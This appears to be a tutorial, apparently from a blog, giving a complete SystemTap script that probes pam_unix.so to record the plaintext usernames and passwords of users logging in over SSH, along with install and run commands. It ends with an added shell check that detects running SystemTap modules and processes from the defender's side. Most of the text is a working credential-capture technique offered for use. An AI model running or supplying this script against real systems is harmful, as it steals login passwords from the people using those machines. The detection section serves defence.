SystemTap is a very powerful kernel debugging tool that can answer many questions about what happens inside the kernel. Linux uses PAM modules to check user information and authentication data in order to decide whether a user may log in to the system. Using this fact, a SystemTap script can capture the function calls inside the pam_unix.so shared library and obtain the username and password of a user logging in remotely over SSH.
Test environment: CentOS 6.4 32-bit
Kernel version: 2.6.32-358.el6.i686
First install the following RPM packages:
# yum --releasever=6.4 update
# yum install -y systemtap
# debuginfo-install $(rpm -qf /lib/security/pam_unix.so)
Create the script file and write the following code into it:
# touch /root/capture_pass.stp
#!/usr/bin/stap
global username, pass, issuccret = 1;
# entry probe: read the name and password arguments handed to _unix_verify_password
probe process("/lib/security/pam_unix.so").function("_unix_verify_password")
{
    username = user_string($name);
    pass = user_string($p);
}
# return probe: a return value of 0 means the password was accepted
probe process("/lib/security/pam_unix.so").function("_unix_verify_password").return
{
    if ($return == 0)
    {
        printf("User:%s\npassword:%s\n\n", username, pass);
        issuccret = 0;
    }
}
# session probe: fires when PAM opens the session for the logged-in user
probe process("/lib/security/pam_unix.so").function("pam_sm_open_session")
{
    if (issuccret != 0)
    {
        printf("Login via ssh service.\nuser:%s\npassword:%s\n\n", username, pass);
    }
    issuccret = 1;
}
Give the script execute permission:
chmod +x capture_pass.stp
Create a file to record the passwords:
touch password.txt
Run the SystemTap script:
stap capture_pass.stp -o password.txt
Run the capture_pass.stp script locally while logging in to the system over SSH. A failed first login attempt is not a problem: the script does not record the wrong passwords you try. After a successful login, press Ctrl+C to stop the script and view password.txt; the credentials have been captured. SystemTap is a powerful tool, which is why only the superuser is allowed to use it.
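From the defender's side, a script like the one above does not run invisibly: stap loads a kernel module whose name starts with "stap_" and keeps a staprun/stapio process pair alive for as long as the probes are active. The following host check is an added example, not part of the original post; it assumes SystemTap's default module naming, and the module and process listings it parses are constructed samples.

```shell
#!/bin/sh
# Added host check (not from the original post): a running SystemTap script
# leaves two visible artifacts, a loaded kernel module whose name starts with
# "stap_" and a staprun/stapio process pair. The filter functions read a
# /proc/modules-style and a "ps -eo pid,comm"-style listing from stdin so
# they work both on the constructed samples below and on the live host.

# Print the names of loaded modules that SystemTap built (stap_*).
stap_modules() {
    awk '$1 ~ /^stap_/ { print $1 }'
}

# Print the PIDs of staprun or stapio processes.
stap_processes() {
    awk '$2 == "staprun" || $2 == "stapio" { print $1 }'
}

# Inspect the running host; return 1 if either artifact is present.
check_live_host() {
    mods=$(stap_modules < /proc/modules)
    procs=$(ps -eo pid,comm | stap_processes)
    [ -z "$mods" ] && [ -z "$procs" ] && return 0
    [ -n "$mods" ]  && echo "SystemTap module(s) loaded: $mods"
    [ -n "$procs" ] && echo "staprun/stapio running, pid(s): $procs"
    return 1
}

# Constructed samples (not captured from a real host) for offline use.
SAMPLE_MODULES='stap_capture_pass_4242 98304 0 - Live 0xf8a00000
uprobes 8192 1 stap_capture_pass_4242, Live 0xf89f0000
ext4 364544 2 - Live 0xf8800000'
SAMPLE_PS='  PID COMMAND
    1 init
 4242 staprun
 4243 stapio
 4300 sshd'

# demo        -> run the filters over the constructed samples
# demo live   -> inspect the host this shell is running on
demo() {
    if [ "$1" = "live" ]; then
        check_live_host
    else
        printf '%s\n' "$SAMPLE_MODULES" | stap_modules
        printf '%s\n' "$SAMPLE_PS" | stap_processes
    fi
}
```

On a host where the capture script from this page is running, check_live_host reports the stap_capture_pass_* module and the staprun/stapio PIDs; on a clean host it returns 0 and prints nothing.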